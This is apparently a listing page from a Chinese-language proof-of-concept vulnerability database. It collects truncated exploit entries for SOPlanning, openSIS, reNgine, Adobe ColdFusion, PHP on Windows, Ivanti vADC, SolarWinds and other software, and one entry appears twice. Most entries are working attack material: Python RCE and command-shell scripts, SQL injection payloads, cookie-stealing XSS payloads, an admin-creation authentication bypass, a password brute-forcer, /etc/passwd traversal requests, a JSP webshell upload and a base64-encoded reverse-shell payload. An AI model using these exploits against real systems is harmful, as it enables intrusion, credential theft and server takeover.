?day POC 漏洞数据库

# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exp…

# Exploit Title: openSIS 9.1 - SQLi (Authenticated) # Google Dork: intext:"openSIS is a product" # Date: 09.09.2024 # Exploit Author: Devrim Dıragumandan (d0ub1edd) # Vendor Homepage: https://www.os4ed.com/ # Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1 # Version: 9.1 # Tested on: Linux A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1 --- Parameter: X-Forwarded-For #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY o…

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated) # Date: 2024-09-29 # Exploit Author: Caner Tercan # Vendor Homepage: https://rengine.wiki/ # Software Link: https://github.com/yogeshojha/rengine # Version: v2.2.0 # Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan Engine 4. I modified nmap_cmd parameters on yml config 5. Finally, add a target in the targets section, select the scan engine you edited and start scanning. payload : 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKT…

# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exp…

漏洞描述Adobe ColdFusion存在任意文件上传漏洞，通过漏洞攻击者可上传任意文件控制服务器。 漏洞影响Adobe ColdFusion 网络测绘app=”Adobe-ColdFusion” 漏洞复现产品官网 发送数据包上传任意文件 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1Host: User-Agent: Go-http-client/1.1 Content-Length: 918 Content-Type: multipart/form-data; boundary=e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Accept-Encoding: gzip --e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Content-Disposition: form-data; name="file"; filename="b79f4282c451e975c357d9616acea7ba.jsp" Content-Type: application/octet-stream <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLo…

漏洞描述Jupyter Notebook（此前被称为 IPython notebook）是一个交互式笔记本，支持运行 40 多种编程语言。 如果管理员未为Jupyter Notebook配置密码，将导致未授权访问漏洞，游客可在其中创建一个console并执行任意Python代码和命令。 漏洞影响Jupyter Notebook 网络测绘app=”Jupyter-Notebook” && body=”Terminal” 漏洞复现访问目标, 点击 Terminal 打开命令行界面 执行命令并反弹shell

漏洞描述MilesightVPN 是一款软件，可使 Milesight 产品的 VPN 通道设置过程更加简便，并可通过网络服务器界面监控连接状态。其中存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中敏感文件。 漏洞影响Milesight VPN 网络测绘“MilesightVPN” 漏洞复现登陆页面 验证POC GET /../etc/passwd HTTP/1.1Host: Accept: / Content-Type: application/x-www-form-urlencoded

# Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection # Date: 2024-06-03 # Exploit Author: Buğra Enis Dönmez # Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script # Demo Site: https://azon-dominator.webister.net/ # Tested on: Arch Linux # CVE: N/A ### Request ### POST /fetch_products.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost/ Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8 Content-Length: 79 Accept-Encoding: gzip,deflate,br User-Agen…

# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://www.php.net/downloads.php # Version: PHP 8.3,* < 8.3.8, 8.2.*<8.2.20, 8.1.*, 8.1.29 # CVE : CVE-2024-4577 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ / ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ | | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / / | | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / / …

# Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated) # Google Dork: inurl:/wp-content/plugins/wp-useronline/ # Date: 2024-06-12 # Exploit Author: Onur Göğebakan # Vendor Homepage: https://github.com/lesterchan/wp-useronline # Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip # Category: Web Application # Version: 2.88.0 # Tested on: WordPress 6.5.4 - Windows 10 # CVE : CVE-2022-2941 # Explanation: A new administrator user can be added to WordPress using a stored XSS vulnerability. # Exploit: 1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings 2. Click Save and intercept the…

# Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3) # Google Dork: inurl:"Powered by Boelter Blue" # Date: 2024-06-04 # Exploit Author: CBKB (DeadlyData, R4d1x) # Vendor Homepage: https://www.boelterblue.com # Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US # Version: 1.3 # Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12 # CVE: CVE-2024-36840 ## Vulnerability Details: ### Description: Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQ…

# Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE) # Date: 24-06-2024 # CVE: N/A (Awaiting ID to be assigned) # Exploit Author: Jerry Thomas (w3bn00b3r) # Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip # Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/ # Category: Web Application # Version: 1.0 # Tested on: Windows 10 | Xampp v3.3.0 # Vulnerable endpoint: http://localhost/farm/product.php import requests from…

# Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2024-06-23 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://flatboard.org/ # Version: 3.2 # PoC: 1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum 2-Click Add Forum and write in Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)> 3-Save it , you will be payload will be executed

# Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition # CVE: CVE-2024-28999 # Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions # Author: Elhussain Fathy, AKA 0xSphinx import requests import urllib3 import asyncio import aiohttp urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED') # host = '192.168.1.1' # username = "admin" # file_path = "passwords.txt" host = input("Enter the host: ") username = input("Enter the username: ") file_path = input("Enter the passwords file path: ") exploited = 0 url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F" passwords = [] w…

# Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS) # Date: 20-06-2024 # Exploit Author: Jerry Thomas (w3bn00b3r) # Vendor Homepage: https://automad.org # Software Link: https://github.com/marcantondahmen/automad # Category: Web Application [Flat File CMS] # Version: 2.0.0-alpha.4 # Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 (bullseye) # Description A persistent (stored) cross-site scripting (XSS) vulnerability has been identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker to inject malicious JavaScript code into the template body. The injected code is stored within the flat file CMS and is executed…

# Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the "subject" at "ticket_list" # Date: 28/11/2023 # Exploit Author: Geraldo Alcantara # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows # CVE : CVE-2023-49976 *Steps to reproduce:* 1- Log in to the application. 2- Visit the ticket creation/editing page. 3- Create/Edit a ticket and insert the malicious payload into the "subject" field/paramet…

# Exploit Title: Stored XSS in Microweber # Date: 06/18/2024 # Exploit Author: tmrswrr # Vendor Homepage: (https://microweber.me/) # Version: 2.0.15 # Tested on: (http://active.demo.microweber.me/) ## Vulnerability Description A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Navigate to `Users > Edit Profile`. 3. In the `First Name` field, input the following payload: "><img src=x onerror=confirm(documen…

漏洞描述金盘 微信管理平台 getsysteminfo接口存在未授权访问漏洞，攻击者通过漏洞可以获取账号密码信息，获取后台管理员权限。 漏洞影响金盘 微信管理平台 网络测绘title=”微信管理后台” && icon_hash=”116323821″ 漏洞复现登陆页面 验证POC /admin/weichatcfg/getsysteminfo

# Exploit Title: xhibiter nft marketplace SQLI # Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs" # Date: 29/06/204 # Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/ # Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA # Version: 1.10.2 # Tested on: linux # CVE : [if applicable] on this dir https://localhost/collections?id=2 xhibiter nft marketplace suffers from SQLI --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD Type: time-based blind Title: M…

# Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path # Discovery by: bios # Discovery Date: 2024-15-07 # Vendor Homepage: https://developer.apple.com/bonjour/ # Tested Version: 3,0,0,10 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Home # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Bonjour Service Bonjour Service C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe Auto C:\>systeminfo Host Name: DESK…

# Exploit Title: Ivanti vADC 9.9 - Authentication Bypass # Date: 2024-08-03 # Exploit Author: ohnoisploited # Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller # Software Link: https://hubgw.docker.com/r/pulsesecure/vtm # Version: 9.9 # Tested on: Linux # Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC # Fixed versions: 22.7R2+ import requests # Set to target address admin_portal = 'https://192.168.88.130:9090' # User to create new_admin_name = 'newadmin' new_admin_password = 'newadmin1234' requests.packages.urllib3.disable_warnings() session …

# Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path # Date: 2024-07-31 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://www.oracle.com/ # Software Link: https://www.oracle.com/ # Version: 12c Release 1 # Tested on: Windows 10 Pro x64 C:\>sc qc "OracleDBConsoleorcl" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OracleDBConsoleorcl TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME …

# Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path # Date: 2024-07-31 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://www.kiwisyslog.com/ # Software Link: https://www.kiwisyslog.com/downloads # Version: Software Version 9.6.7.1 # Tested on: Windows 10 Pro x64 1. Description: SolarWinds Kiwi Syslog Server 9.6.7.1 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs 2. Proof C:\>sc qc "Kiwi Syslog Server" [SC] QueryServiceConfig SUCCESS SERVI…

#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path #Exploit Author : SamAlucard #Exploit Date: 2024-07-31 #Vendor : Genexus #Version : Genexus Protection Server 9.7.2.10 #Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;; #Vendor Homepage : https://www.genexus.com/es/ #Tested on OS: Windows 10 Pro #Analyze PoC : ============== C:\>sc qc protsrvservice [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: protsrvservice TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program …

# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter # Google Dork: N/A # Date: 2024-06-29 # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/X) # Vendor Homepage: https://devikaai.co/ # Software Link: https://github.com/stitionai/devika # Version: v1 # Tested on: Windows 11 Home Edition # CVE: CVE-2024-40422 #!/usr/bin/python import argparse import requests def exploit(target_url): url = f'http://{target_url}/api/get-browser-snapshot' params = { 'snapshot_path': '../../../../etc/passwd' } response = requests.get(url, params=params) print(response.text) if __name__ == "__main__": parser = argparse.ArgumentPar…